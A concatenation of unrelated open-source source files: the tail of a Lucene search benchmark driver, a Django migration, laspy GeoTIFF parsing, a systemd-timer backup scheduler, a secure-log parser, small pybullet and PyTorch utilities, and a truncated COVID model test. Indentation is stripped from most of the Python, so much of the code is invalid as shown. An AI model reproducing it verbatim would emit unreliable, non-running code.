elif MAX_HEAP_GB is not None:
w('-Xms%sg' % MAX_HEAP_GB)
w('-Xmx%sg' % MAX_HEAP_GB)
w('-Xloggc:%s/gc.log' % logsDir)
if DO_ZV_ROBOT and desc.startswith('Zing'):
w('-XX:ARTAPort=8111')
w('-verbose:gc')
w('-XX:+PrintGCDetails')
w('-XX:+PrintGCTimeStamps')
w('-XX:+PrintHeapAtGC')
w('-XX:+PrintTenuringDistribution')
w('-XX:+PrintGCApplicationStoppedTime')
w('-XX:PrintCMSStatistics=2')
if desc.startswith('Zing'):
w('-XX:+PrintCommandLine')
w('-XX:+PrintCommandLineFlags')
#w('-XX:+PrintFlagsFinal')
cp = '.:$LUCENE_HOME/build/core/classes/java:$LUCENE_HOME/build/memory/classes/java:$LUCENE_HOME/build/codecs/classes/java:$LUCENE_HOME/build/highlighter/classes/java:$LUCENE_HOME/build/test-framework/classes/java:$LUCENE_HOME/build/queryparser/classes/java:$LUCENE_HOME/build/suggest/classes/java:$LUCENE_HOME/build/analysis/common/classes/java:$LUCENE_HOME/build/grouping/classes/java'.replace('$LUCENE_HOME', LUCENE_HOME)
if FRAGGER_JAR is not None:
cp = FRAGGER_JAR + ':' + cp
w('-cp')
w(cp)
w('perf.SearchPerfTest')
w('-indexPath %s' % indexPath)
if dirImpl == 'RAMDirectory' and postingsFormat == 'Direct':
# Leaves postings on disk (since they will be turned into
# DirectPF in RAM), and loads everything else into RAM:
w('-dirImpl RAMExceptDirectPostingsDirectory')
else:
w('-dirImpl %s' % dirImpl)
w('-analyzer %s' % ANALYZER)
w('-taskSource server:%s:%s' % (SERVER_HOST, SERVER_PORT))
w('-searchThreadCount %d' % SEARCH_THREAD_COUNT)
w('-field body')
w('-similarity DefaultSimilarity')
w('-commit %s' % COMMIT_POINT)
w('-seed 0')
w('-staticSeed 0')
w('-hiliteImpl %s' % HIGHLIGHT_IMPL)
w('-topN %d' % TOP_N)
serverLog = '%s/server.log' % logsDir
w('-log %s' % serverLog)
# Do indexing/NRT reopens:
if DO_NRT:
if VERBOSE_INDEXING:
w('-verbose')
w('-nrt')
w('-indexThreadCount 1')
w('-docsPerSecPerThread %s' % DOCS_PER_SEC_PER_THREAD)
w('-lineDocsFile %s' % LINE_DOCS_FILE)
w('-reopenEverySec %g' % REOPEN_EVERY_SEC)
w('-store')
w('-tvs')
w('-postingsFormat %s' % postingsFormat)
w('-idFieldPostingsFormat %s' % postingsFormat)
w('-cloneDocs')
stdLog = '%s/std.log' % logsDir
if FRAGGER_JAR is not None:
idx = command.index('perf.SearchPerfTest')
command = '%s org.managedruntime.perftools.Fragger -v -a %s -exec %s' % (' '.join(command[:idx]), FRAGGER_ALLOC_MB_PER_SEC, ' '.join(command[idx:]))
else:
command = ' '.join(command)
command = '%s -d %s -l %s/hiccups %s > %s 2>&1' % \
(JHICCUP_PATH, WARMUP_SEC*1000, logsDir, command, stdLog)
p = None
vmstatProcess = None
zvRobotProcess = None
clientProcess = None
topThread = None
success = False
try:
touchCmd = '%s -Xmx1g -cp .:$LUCENE_HOME/build/core/classes/java:$LUCENE_HOME/build/codecs/classes/java:$LUCENE_HOME/build/highlighter/classes/java:$LUCENE_HOME/build/test-framework/classes/java:$LUCENE_HOME/build/queryparser/classes/java:$LUCENE_HOME/build/suggest/classes/java:$LUCENE_HOME/build/analysis/common/classes/java:$LUCENE_HOME/build/grouping/classes/java perf.OpenCloseIndexWriter %s 2>&1'.replace('$LUCENE_HOME', LUCENE_HOME) % (javaCommand, indexPath)
#print ' run %s' % touchCmd
while True:
print ' clean index'
if system(touchCmd):
print ' failed .. retry'
time.sleep(2.0)
else:
break
t0 = time.time()
vmstatProcess = subprocess.Popen('vmstat 1 > %s/vmstat.log 2>&1' % logsDir, shell=True)
print ' server command: %s' % command
p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
if DO_ZV_ROBOT and desc.startswith('Zing'):
cmd = '%s -Xmx1g -jar %s %s/ZVRobot %s/ZVRobot.prop > %s/ZVRobot.log 2>&1' % \
(ORACLE_JVM, ZV_ROBOT_JAR, logsDir, os.path.split(ZV_ROBOT_JAR)[0], logsDir)
print ' ZVRobot command: %s' % cmd
zvRobotProcess = subprocess.Popen(cmd, shell=True)
del cmd
else:
zvRobotProcess = None
print ' wait for server startup...'
time.sleep(2.0)
while True:
try:
if open(stdLog).read().find(' ready for client...') != -1:
break
v = p.poll()
if p.poll() is not None:
raise RuntimeError(' failed to start:\n\n%s' % open(stdLog).read())
except IOError:
pass
time.sleep(1.0)
print ' %.1f sec to start; start test now' % (time.time()-t0)
time.sleep(2.0)
topThread = TopThread('%s/top.log' % logsDir)
topThread.setDaemon(True)
topThread.start()
t0 = time.time()
if CLIENT_HOST is not None:
# Remote client:
command = 'python -u %s %s %s %s %s %d %.1f results.bin' % \
(REMOTE_CLIENT, TASKS_FILE, SERVER_HOST, SERVER_PORT, targetQPS, TASKS_PER_CAT, RUN_TIME_SEC)
command = 'ssh %s@%s %s > %s/client.log 2>&1' % (CLIENT_USER, CLIENT_HOST, command, logsDir)
print ' client command: %s' % command
clientProcess = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
output = clientProcess.communicate()[0].strip()
if len(output) > 0:
print ' %s' % output.replace('\n', '\n ')
if clientProcess.returncode:
raise RuntimeError('client failed; see %s/client.log' % logsDir)
print ' copy results.bin back...'
if system('scp %s@%s:results.bin %s > /dev/null 2>&1' % (CLIENT_USER, CLIENT_HOST, logsDir)):
raise RuntimeError('scp results.bin failed')
if system('ssh %s@%s rm -f results.bin' % (CLIENT_USER, CLIENT_HOST)):
raise RuntimeError('rm results.bin failed')
else:
clientProcess = None
f = open('%s/client.log' % logsDir, 'wb')
sendTasks.run(TASKS_FILE, 'localhost', SERVER_PORT, targetQPS, TASKS_PER_CAT, RUN_TIME_SEC, '%s/results.bin' % logsDir, f, False)
f.close()
t1 = time.time()
print ' test done (%.1f total sec)' % (t1-t0)
if not SMOKE_TEST and (t1 - t0) > RUN_TIME_SEC * 1.30:
print ' marking this job finished'
finished = True
finally:
kill('SearchPerfTest', p)
kill('vmstat', vmstatProcess)
if clientProcess is not None:
kill('sendTasks.py', clientProcess)
if not os.path.exists('%s/results.bin' % logsDir):
print ' copy results.bin back...'
system('scp %s@%s:results.bin %s > /dev/null 2>&1' % (CLIENT_USER, CLIENT_HOST, logsDir))
if DO_ZV_ROBOT and zvRobotProcess is not None:
kill('ZVRobot', zvRobotProcess)
if topThread is not None:
topThread.stop = True
topThread.join()
print ' done stopping top'
try:
printAvgCPU('%s/top.log' % logsDir)
except:
print 'WARNING: failed to compute avg CPU usage:'
traceback.print_exc()
print ' done'
open('%s/done' % logsDir, 'wb').close()
if DO_EMAIL and os.path.getsize('%s/log.txt' % LOGS_DIR) < 5*1024*1024:
try:
emailResult(open('%s/log.txt' % LOGS_DIR).read(), 'Test RUNNING [%s]' % (datetime.datetime.now() - startTime))
except:
print ' send email failed'
traceback.print_exc()
return logsDir, finished
def run():
if SMOKE_TEST:
print
print '***SMOKE_TEST***'
print
captureEnv(LOGS_DIR)
print 'Compile java sources...'
cmd = '%sc -Xlint -Xlint:deprecation -cp $LUCENE_HOME/build/core/classes/java:$LUCENE_HOME/build/highlighter/classes/java:$LUCENE_HOME/build/codecs/classes/java:$LUCENE_HOME/build/test-framework/classes/java:$LUCENE_HOME/build/queryparser/classes/java:$LUCENE_HOME/build/suggest/classes/java:$LUCENE_HOME/build/analysis/common/classes/java:$LUCENE_HOME/build/grouping/classes/java perf/Args.java perf/IndexThreads.java perf/OpenCloseIndexWriter.java perf/Task.java perf/CreateQueries.java perf/LineFileDocs.java perf/PKLookupPerfTest.java perf/RandomQuery.java perf/SearchPerfTest.java perf/TaskParser.java perf/Indexer.java perf/LocalTaskSource.java perf/PKLookupTask.java perf/RemoteTaskSource.java perf/SearchTask.java perf/TaskSource.java perf/IndexState.java perf/NRTPerfTest.java perf/RespellTask.java perf/ShowFields.java perf/TaskThreads.java perf/KeepNoCommitsDeletionPolicy.java' % ORACLE_JVM
cmd = cmd.replace('$LUCENE_HOME', LUCENE_HOME)
if system(cmd):
raise RuntimeError('compile failed')
if CLIENT_HOST is not None:
print 'Copy sendTasks.py to client host %s' % CLIENT_HOST
if system('scp sendTasks.py %s@%s: > /dev/null 2>&1' % (CLIENT_USER, CLIENT_HOST)):
raise RuntimeError('copy sendTasks.py failed')
print 'Copy tasks file "%s" to client host %s' % (TASKS_FILE, CLIENT_HOST)
if system('scp %s %s@%s: > /dev/null 2>&1' % (TASKS_FILE, CLIENT_USER, CLIENT_HOST)):
raise RuntimeError('copy sendTasks.py failed')
startTime = datetime.datetime.now()
finished = set()
if DO_AUTO_QPS:
maxQPS = {}
reQPSOut = re.compile(r'; +([0-9\.]+) qps out')
reQueueSize = re.compile(r'\[(\d+), (\d+)\]$')
print
print 'Find max QPS per job:'
for job in JOBS:
desc, dirImpl, postingsFormat = job
logsDir = runOne(startTime, desc, dirImpl, postingsFormat, 'sweep')[0]
qpsOut = []
with open('%s/client.log' % logsDir) as f:
for line in f.readlines():
m = reQPSOut.search(line)
m2 = reQueueSize.search(line)
if m is not None and m2 is not None and int(m2.group(2)) > 200:
qpsOut.append(float(m.group(1)))
if len(qpsOut) < 10:
raise RuntimeError("couldn't find enough 'qps out' lines: got %d" % len(qpsOut))
# QPS out is avg of last 5 seconds ... make sure we only measure actual saturation
qpsOut = qpsOut[5:]
maxQPS[job] = sum(qpsOut)/len(qpsOut)
print ' QPS throughput=%.1f' % maxQPS[job]
if maxQPS[job] < 2*AUTO_QPS_START:
raise RuntimeError('max QPS for job %s (= %s) is < 2*AUTO_QPS_START (= %s)' % \
(desc, maxQPS[job], AUTO_QPS_START))
for pctPoint in AUTO_QPS_PERCENT_POINTS:
realJobsLeft = False
for job in JOBS:
if job in finished:
continue
desc, dirImpl, postingsFormat = job
targetQPS = AUTO_QPS_START + (pctPoint/100.)*(maxQPS[job] - AUTO_QPS_START)
if runOne(startTime, desc, dirImpl, postingsFormat, targetQPS, pct=pctPoint)[1]:
if desc.lower().find('warmup') == -1:
finished.add(job)
elif desc.lower().find('warmup') == -1:
realJobsLeft = True
if not realJobsLeft:
break
else:
# Which tasks exceeded capacity:
targetQPS = QPS_START
while len(finished) != len(JOBS):
realJobsLeft = False
for job in JOBS:
if job in finished:
continue
desc, dirImpl, postingsFormat = job
if runOne(startTime, desc, dirImpl, postingsFormat, targetQPS)[1]:
if desc.lower().find('warmup') == -1:
finished.add(job)
elif desc.lower().find('warmup') == -1:
realJobsLeft = True
if QPS_END is not None and targetQPS >= QPS_END:
break
if not realJobsLeft:
break
targetQPS += QPS_INC
now = datetime.datetime.now()
print
print '%s: ALL DONE (elapsed time %s)' % (now, now - startTime)
print
def printAvgCPU(topLog):
cpuCoreCount = int(os.popen('grep processor /proc/cpuinfo | wc').read().strip().split()[0])
entCount = 0
with open(topLog) as f:
byPid = {}
cpuCol = None
for line in f.readlines():
line = line.strip()
if line.startswith('Time'):
cpuCol = None
elif line.startswith('PID'):
cpuCol = line.split().index('%CPU')
entCount += 1
elif cpuCol is not None and entCount > 20:
cols = line.split()
if len(cols) > cpuCol:
pid = int(cols[0])
cpu = float(cols[cpuCol])
if pid not in byPid:
# sum, min, max, count
byPid[pid] = [0.0, None, None, 0]
l = byPid[pid]
l[0] += cpu
l[3] += 1
if l[1] is None:
l[1] = cpu
else:
l[1] = min(cpu, l[1])
if l[2] is None:
l[2] = cpu
else:
l[2] = max(cpu, l[2])
pids = []
for pid, (sum, minCPU, maxCPU, count) in byPid.items():
pids.append((sum/count, minCPU, maxCPU, pid))
pids.sort(reverse=True)
print ' CPU usage [%d CPU cores]' % cpuCoreCount
for avgCPU, minCPU, maxCPU, pid in pids:
if maxCPU > 20:
print ' avg %7.2f%% CPU, min %7.2f%%, max %7.2f%% pid %s' % (avgCPU, minCPU, maxCPU, pid)
def emailResult(body, subject):
fromAddress = toAddress = '<EMAIL>'
msg = email.mime.text.MIMEText(body)
msg["From"] = fromAddress
msg["To"] = toAddress
msg["Subject"] = subject
message = msg.as_string()
if USE_SMTP:
if False:
s = smtplib.SMTP('localhost')
else:
import localpass
s = smtplib.SMTP(localpass.SMTP_SERVER, port=localpass.SMTP_PORT)
s.ehlo(fromAddress)
s.starttls()
s.ehlo(fromAddress)
localpass.smtplogin(s)
print 'sending mail...'
s.sendmail(fromAddress, (toAddress,), message)
print 'quitting smtp...'
s.quit()
else:
p = subprocess.Popen(["/usr/sbin/sendmail", "-t"], stdin=subprocess.PIPE)
p.communicate(message)
def main():
if os.path.exists(LOGS_DIR):
raise RuntimeError('please move last logs dir away')
os.makedirs(LOGS_DIR)
logOut = open('%s/log.txt' % LOGS_DIR, 'wb')
teeStdout = Tee(logOut, 'stdout')
teeStderr = Tee(logOut, 'stderr')
failed = False
try:
run()
except:
traceback.print_exc()
failed = True
finally:
if os.path.exists('/localhome/ftpit.sh'):
system('/localhome/ftpit.sh')
logOut.flush()
if DO_EMAIL and os.path.getsize('%s/log.txt' % LOGS_DIR) < 5*1024*1024:
if failed:
subject = 'Test FAIL'
else:
subject = 'Test SUCCESS'
emailResult(open('%s/log.txt' % LOGS_DIR).read(), subject)
logOut.close()
os.chmod('%s/log.txt' % LOGS_DIR, 0444)
del teeStdout
del teeStderr
if __name__ == '__main__':
main()
|
capstone/capdb/migrations/0090_auto_20200127_2030.py | rachelaus/capstone | 134 | 12697065 | <gh_stars>100-1000
# Generated by Django 2.2.9 on 2020-01-27 20:30
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('capdb', '0089_auto_20200127_1957'),
]
operations = [
migrations.RemoveField(
model_name='casetext',
name='metadata',
),
migrations.RemoveIndex(
model_name='casemetadata',
name='idx_in_scope',
),
migrations.RemoveIndex(
model_name='casemetadata',
name='idx_in_scope_reporter',
),
migrations.RemoveIndex(
model_name='casemetadata',
name='idx_in_scope_jurisdiction',
),
migrations.RemoveIndex(
model_name='casemetadata',
name='idx_in_scope_court',
),
migrations.RemoveField(
model_name='casemetadata',
name='court_name',
),
migrations.RemoveField(
model_name='casemetadata',
name='court_name_abbreviation',
),
migrations.RemoveField(
model_name='casemetadata',
name='court_slug',
),
migrations.RemoveField(
model_name='casemetadata',
name='jurisdiction_name',
),
migrations.RemoveField(
model_name='casemetadata',
name='jurisdiction_name_long',
),
migrations.RemoveField(
model_name='casemetadata',
name='jurisdiction_slug',
),
migrations.RemoveField(
model_name='casemetadata',
name='jurisdiction_whitelisted',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='court_name',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='court_name_abbreviation',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='court_slug',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='jurisdiction_name',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='jurisdiction_name_long',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='jurisdiction_slug',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='jurisdiction_whitelisted',
),
migrations.DeleteModel(
name='CaseText',
),
]
|
laspy/vlrs/geotiff.py | CCInc/laspy | 240 | 12697066 | <gh_stars>100-1000
import logging
from collections import namedtuple
from typing import List, Optional
from . import vlrlist
from .known import GeoAsciiParamsVlr, GeoDoubleParamsVlr, GeoKeyDirectoryVlr
GeoTiffKey = namedtuple("GeoTiffKey", ("id", "value"))
logger = logging.getLogger(__name__)
GTModelTypeGeoKey = 1024
GTRasterTypeGeoKey = 1025
GTCitationGeoKey = 1026
GeogCitationGeoKey = 2049
GeogAngularUnitsGeoKey = 2054
ProjectedCSTypeGeoKey = 3072
ProjLinearUnitsGeoKey = 3076
def parse_geo_tiff_keys_from_vlrs(vlr_list: vlrlist.VLRList) -> List[GeoTiffKey]:
    """Gets the 3 GeoTiff VLRs from the vlr_list and parses them into
    a nicer structure
Parameters
----------
vlr_list: laspy.vrls.vlrslist.VLRList list of vlrs from a las file
Raises
------
IndexError if any of the needed GeoTiffVLR is not found in the list
Returns
-------
List of GeoTiff keys parsed from the VLRs
"""
geo_key_dir = vlr_list.get_by_id(
GeoKeyDirectoryVlr.official_user_id(), GeoKeyDirectoryVlr.official_record_ids()
)[0]
try:
geo_doubles = vlr_list.get_by_id(
GeoDoubleParamsVlr.official_user_id(),
GeoDoubleParamsVlr.official_record_ids(),
)[0]
except IndexError:
geo_doubles = None
try:
geo_ascii = vlr_list.get_by_id(
GeoAsciiParamsVlr.official_user_id(),
GeoAsciiParamsVlr.official_record_ids(),
)[0]
except IndexError:
geo_ascii = None
return parse_geo_tiff(geo_key_dir, geo_doubles, geo_ascii)
def parse_geo_tiff(
key_dir_vlr: GeoKeyDirectoryVlr,
double_vlr: Optional[GeoDoubleParamsVlr],
ascii_vlr: Optional[GeoAsciiParamsVlr],
) -> List[GeoTiffKey]:
"""Parses the GeoTiff VLRs information into nicer structs"""
geotiff_keys = []
for k in key_dir_vlr.geo_keys:
if k.tiff_tag_location == 0:
value = k.value_offset
elif k.tiff_tag_location == 34736:
if double_vlr is None:
                raise RuntimeError(
                    "Geotiff tag location points to GeoDoubleParams, "
                    "but it does not exist"
                )
value = double_vlr.doubles[k.value_offset]
elif k.tiff_tag_location == 34737:
if ascii_vlr is None:
                raise RuntimeError(
                    "Geotiff tag location points to GeoAsciiParams, "
                    "but it does not exist"
                )
value = ascii_vlr.string(k.value_offset, k.count)
else:
logger.warning(
"GeoTiffKey with unknown tiff tag location ({})".format(
k.tiff_tag_location
)
)
continue
geotiff_keys.append(GeoTiffKey(k.id, value))
return geotiff_keys
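
# A minimal usage sketch (assumption: a hypothetical "example.las" file and the
# laspy 2.x reading API; adjust to your own data):
if __name__ == "__main__":
    import laspy

    las = laspy.read("example.las")
    for key in parse_geo_tiff_keys_from_vlrs(las.header.vlrs):
        print(key.id, key.value)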
|
bups/scheduler/systemd_user.py | emersion/bups | 106 | 12697092 | import ConfigParser
import io
import os
base_dir = os.getenv("XDG_CONFIG_DIR", os.path.join(os.path.expanduser("~"), ".config"))
config_dir = os.path.join(base_dir, "systemd/user")
def is_available():
return any(os.access(os.path.join(path, "systemctl"), os.X_OK)
for path in os.getenv("PATH").split(os.pathsep))
def get_timer_path(job_id):
return os.path.join(config_dir, job_id + ".timer")
def get_service_path(job_id):
return os.path.join(config_dir, job_id + ".service")
def new_config():
config = ConfigParser.RawConfigParser()
config.optionxform = str
return config
def parse_config(timer_cfg):
config = new_config()
config.readfp(io.BytesIO(timer_cfg))
period = config.get("Timer", "OnCalendar").split('/')[1]
return { "period": period, "delay": "0" }
def get_job(job_id):
with open(get_timer_path(job_id), "r") as f:
cfg = parse_config(f.read())
cfg["id"] = job_id
return cfg
def write_config(config, file_path):
with open(file_path, "w") as f:
config.write(f)
def update_job(job):
job_id = job["id"]
period = job["period"]
command = job["command"]
# Timer
config = new_config()
config.add_section("Unit")
config.set("Unit", "Description", "Bups backup manager timer")
config.add_section("Timer")
config.set("Timer", "OnCalendar", "*-*-1/%d" % period)
config.set("Timer", "Persistent", "true")
config.add_section("Install")
config.set("Install", "WantedBy", "timers.target")
write_config(config, get_timer_path(job_id))
# Create service
config = new_config()
config.add_section("Unit")
config.set("Unit", "Description", "Bups backup manager service")
config.add_section("Service")
config.set("Service", "Type", "simple")
config.set("Service", "ExecStart", command)
write_config(config, get_service_path(job_id))
# Notify systemd
call_systemctl(["daemon-reload"])
call_systemctl(["enable", get_timer_path(job_id)])
call_systemctl(["start", job_id])
def remove_job(job_id):
timer_path = get_timer_path(job_id)
service_path = get_service_path(job_id)
timer_basename = os.path.basename(timer_path)
call_systemctl(["stop", timer_basename])
call_systemctl(["disable", timer_basename])
os.remove(timer_path)
os.remove(service_path)
def call_systemctl(args):
cmd = "systemctl --user %s" % " ".join(args)
if os.system(cmd) != 0:
        raise IOError("Failed to run command: %s" % cmd)
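
# A minimal usage sketch (assumption: illustration only) of how a timer unit's
# text maps back onto the job dictionary used by this module:
if __name__ == "__main__":
    sample_timer = (
        "[Unit]\n"
        "Description = Bups backup manager timer\n"
        "[Timer]\n"
        "OnCalendar = *-*-1/7\n"
        "Persistent = true\n"
    )
    print(parse_config(sample_timer)["period"])  # 7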
|
insights/parsers/secure.py | mglantz/insights-core | 121 | 12697104 | """
Secure - file ``/var/log/secure``
==================================
"""
from .. import Syslog, parser
from insights.specs import Specs
@parser(Specs.secure)
class Secure(Syslog):
"""Class for parsing the ``/var/log/secure`` file.
Sample log text::
Aug 24 09:31:39 localhost polkitd[822]: Finished loading, compiling and executing 6 rules
Aug 24 09:31:39 localhost polkitd[822]: Acquired the name org.freedesktop.PolicyKit1 on the system bus
Aug 25 13:52:54 localhost sshd[23085]: pam_unix(sshd:session): session opened for user zjj by (uid=0)
Aug 25 13:52:54 localhost sshd[23085]: error: openpty: No such file or directory
.. note::
Please refer to its super-class :class:`insights.core.Syslog`
.. note::
Because timestamps in the secure log by default have no year,
the year of the logs will be inferred from the year in your
timestamp. This will also work around December/January crossovers.
Examples:
>>> secure = shared[Secure]
>>> secure.get('session opened')
[{'timestamp':'Aug 25 13:52:54',
'hostname':'localhost',
'procname': 'sshd[23085]',
'message': 'pam_unix(sshd:session): session opened for user zjj by (uid=0)',
'raw_message': 'Aug 25 13:52:54 localhost sshd[23085]: pam_unix(sshd:session): session opened for user zjj by (uid=0)'
}]
>>> len(list(secure.get_after(datetime(2017, 8, 25, 0, 0, 0))))
2
"""
time_format = '%b %d %H:%M:%S'
|
examples/pybullet/examples/getTextureUid.py | stolk/bullet3 | 158 | 12697145 | import pybullet as p
p.connect(p.GUI)
plane = p.loadURDF("plane.urdf")
visualData = p.getVisualShapeData(plane, p.VISUAL_SHAPE_DATA_TEXTURE_UNIQUE_IDS)
print(visualData)
curTexUid = visualData[0][8]
print(curTexUid)
texUid = p.loadTexture("tex256.png")
print("texUid=", texUid)
p.changeVisualShape(plane, -1, textureUniqueId=texUid)
for i in range(100):
p.getCameraImage(320, 200)
p.changeVisualShape(plane, -1, textureUniqueId=curTexUid)
for i in range(100):
p.getCameraImage(320, 200)
|
data/dataset.py | Alan-delete/I2L-MeshNet_RELEASE | 544 | 12697147 | import random
import numpy as np
from torch.utils.data.dataset import Dataset
from config import cfg
class MultipleDatasets(Dataset):
def __init__(self, dbs, make_same_len=True):
self.dbs = dbs
self.db_num = len(self.dbs)
self.max_db_data_num = max([len(db) for db in dbs])
self.db_len_cumsum = np.cumsum([len(db) for db in dbs])
self.make_same_len = make_same_len
def __len__(self):
# all dbs have the same length
if self.make_same_len:
return self.max_db_data_num * self.db_num
# each db has different length
else:
return sum([len(db) for db in self.dbs])
def __getitem__(self, index):
if self.make_same_len:
db_idx = index // self.max_db_data_num
data_idx = index % self.max_db_data_num
if data_idx >= len(self.dbs[db_idx]) * (self.max_db_data_num // len(self.dbs[db_idx])): # last batch: random sampling
data_idx = random.randint(0,len(self.dbs[db_idx])-1)
else: # before last batch: use modular
data_idx = data_idx % len(self.dbs[db_idx])
else:
for i in range(self.db_num):
if index < self.db_len_cumsum[i]:
db_idx = i
break
if db_idx == 0:
data_idx = index
else:
data_idx = index - self.db_len_cumsum[db_idx-1]
return self.dbs[db_idx][data_idx]
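
# A minimal usage sketch (assumption: illustration only, using small TensorDatasets
# in place of the project's real dataset classes):
if __name__ == "__main__":
    import torch
    from torch.utils.data import TensorDataset

    db_a = TensorDataset(torch.arange(4))
    db_b = TensorDataset(torch.arange(10))
    combined = MultipleDatasets([db_a, db_b], make_same_len=True)
    print(len(combined))  # 2 * max(len(db_a), len(db_b)) = 20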
|
Lib/test/test_compiler/testcorpus/03_list_ex.py | diogommartins/cinder | 1,886 | 12697149 | [a, *b, *d, a, c]
|
covid_epidemiology/src/models/definitions/us_model_definitions_test.py | DionysisChristopoulos/google-research | 23,901 | 12697154 | <reponame>DionysisChristopoulos/google-research
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for models.definitions.us_model_definitions."""
import unittest
import numpy as np
import pandas as pd
from covid_epidemiology.src import constants
from covid_epidemiology.src.models.definitions import us_model_definitions
class TestStateModelDefinition(unittest.TestCase):
def test_get_ts_features(self):
expected_ts_features = {
constants.DEATH:
constants.JHU_DEATH_FEATURE_KEY,
constants.CONFIRMED:
constants.JHU_CONFIRMED_FEATURE_KEY,
constants.RECOVERED_DOC:
constants.RECOVERED_FEATURE_KEY,
constants.HOSPITALIZED:
constants.HOSPITALIZED_FEATURE_KEY,
constants.HOSPITALIZED_INCREASE:
constants.HOSPITALIZED_INCREASE_FEATURE_KEY,
constants.ICU:
constants.ICU_FEATURE_KEY,
constants.VENTILATOR:
constants.VENTILATOR_FEATURE_KEY,
constants.MOBILITY_INDEX:
constants.MOBILITY_INDEX,
constants.MOBILITY_SAMPLES:
constants.MOBILITY_SAMPLES,
constants.TOTAL_TESTS:
constants.TOTAL_TESTS,
constants.AMP_RESTAURANTS:
constants.AMP_RESTAURANTS,
constants.AMP_NON_ESSENTIAL_BUSINESS:
constants.AMP_NON_ESSENTIAL_BUSINESS,
constants.AMP_STAY_AT_HOME:
constants.AMP_STAY_AT_HOME,
constants.AMP_SCHOOLS_SECONDARY_EDUCATION:
constants.AMP_SCHOOLS_SECONDARY_EDUCATION,
constants.AMP_EMERGENCY_DECLARATION:
constants.AMP_EMERGENCY_DECLARATION,
constants.AMP_GATHERINGS:
constants.AMP_GATHERINGS,
constants.AMP_FACE_MASKS:
constants.AMP_FACE_MASKS,
constants.DOW_WINDOW:
constants.DOW_WINDOW,
constants.AVERAGE_TEMPERATURE:
constants.AVERAGE_TEMPERATURE,
constants.MAX_TEMPERATURE:
constants.MAX_TEMPERATURE,
constants.MIN_TEMPERATURE:
constants.MIN_TEMPERATURE,
constants.RAINFALL:
constants.RAINFALL,
constants.SNOWFALL:
constants.SNOWFALL,
constants.COMMERCIAL_SCORE:
constants.COMMERCIAL_SCORE,
constants.ANTIGEN_POSITIVE:
constants.ANTIGEN_POSITIVE,
constants.ANTIGEN_TOTAL:
constants.ANTIGEN_TOTAL,
constants.ANTIBODY_NEGATIVE:
constants.ANTIBODY_NEGATIVE,
constants.ANTIBODY_TOTAL:
constants.ANTIBODY_TOTAL,
constants.SYMPTOM_COUGH:
constants.SYMPTOM_COUGH,
constants.SYMPTOM_CHILLS:
constants.SYMPTOM_CHILLS,
constants.SYMPTOM_ANOSMIA:
constants.SYMPTOM_ANOSMIA,
constants.SYMPTOM_INFECTION:
constants.SYMPTOM_INFECTION,
constants.SYMPTOM_CHEST_PAIN:
constants.SYMPTOM_CHEST_PAIN,
constants.SYMPTOM_FEVER:
constants.SYMPTOM_FEVER,
constants.SYMPTOM_SHORTNESSBREATH:
constants.SYMPTOM_SHORTNESSBREATH,
constants.VACCINES_GOVEX_FIRST_DOSE_TOTAL:
constants.VACCINES_GOVEX_FIRST_DOSE_TOTAL,
constants.VACCINES_GOVEX_SECOND_DOSE_TOTAL:
constants.VACCINES_GOVEX_SECOND_DOSE_TOTAL,
}
state_model = us_model_definitions.StateModelDefinition(
gt_source=constants.GT_SOURCE_JHU)
actual_ts_features = state_model.get_ts_features()
np.testing.assert_equal(expected_ts_features, actual_ts_features)
def test_get_ts_features_to_preprocess(self):
expected_ts_features = {
constants.MOBILITY_INDEX,
constants.MOBILITY_SAMPLES,
constants.AMP_RESTAURANTS,
constants.AMP_NON_ESSENTIAL_BUSINESS,
constants.AMP_STAY_AT_HOME,
constants.AMP_SCHOOLS_SECONDARY_EDUCATION,
constants.AMP_EMERGENCY_DECLARATION,
constants.AMP_GATHERINGS,
constants.AMP_FACE_MASKS,
constants.CONFIRMED_PER_TESTS,
constants.DEATH_PREPROCESSED,
constants.CONFIRMED_PREPROCESSED,
constants.DOW_WINDOW,
constants.TOTAL_TESTS_PER_CAPITA,
constants.TOTAL_TESTS,
constants.AVERAGE_TEMPERATURE,
constants.MAX_TEMPERATURE,
constants.MIN_TEMPERATURE,
constants.RAINFALL,
constants.SNOWFALL,
constants.COMMERCIAL_SCORE,
constants.ANTIGEN_POSITIVE_RATIO,
constants.ANTIBODY_NEGATIVE_RATIO,
constants.SYMPTOM_COUGH,
constants.SYMPTOM_CHILLS,
constants.SYMPTOM_ANOSMIA,
constants.SYMPTOM_INFECTION,
constants.SYMPTOM_CHEST_PAIN,
constants.SYMPTOM_FEVER,
constants.SYMPTOM_SHORTNESSBREATH,
constants.VACCINATED_RATIO_FIRST_DOSE_PER_DAY_PREPROCESSED,
constants.VACCINATED_RATIO_SECOND_DOSE_PER_DAY_PREPROCESSED,
}
state_model = us_model_definitions.StateModelDefinition(
gt_source=constants.GT_SOURCE_JHU)
actual_ts_features = state_model.get_ts_features_to_preprocess()
np.testing.assert_equal(expected_ts_features, actual_ts_features)
def test_extract_ts_state_features(self):
ts_data = pd.DataFrame([
{
"feature_name": constants.JHU_CONFIRMED_FEATURE_KEY,
"feature_value": 100,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.JHU_CONFIRMED_FEATURE_KEY,
"feature_value": 200,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.JHU_DEATH_FEATURE_KEY,
"feature_value": 10,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.JHU_DEATH_FEATURE_KEY,
"feature_value": float("nan"), # Not populated should ffill to 10.
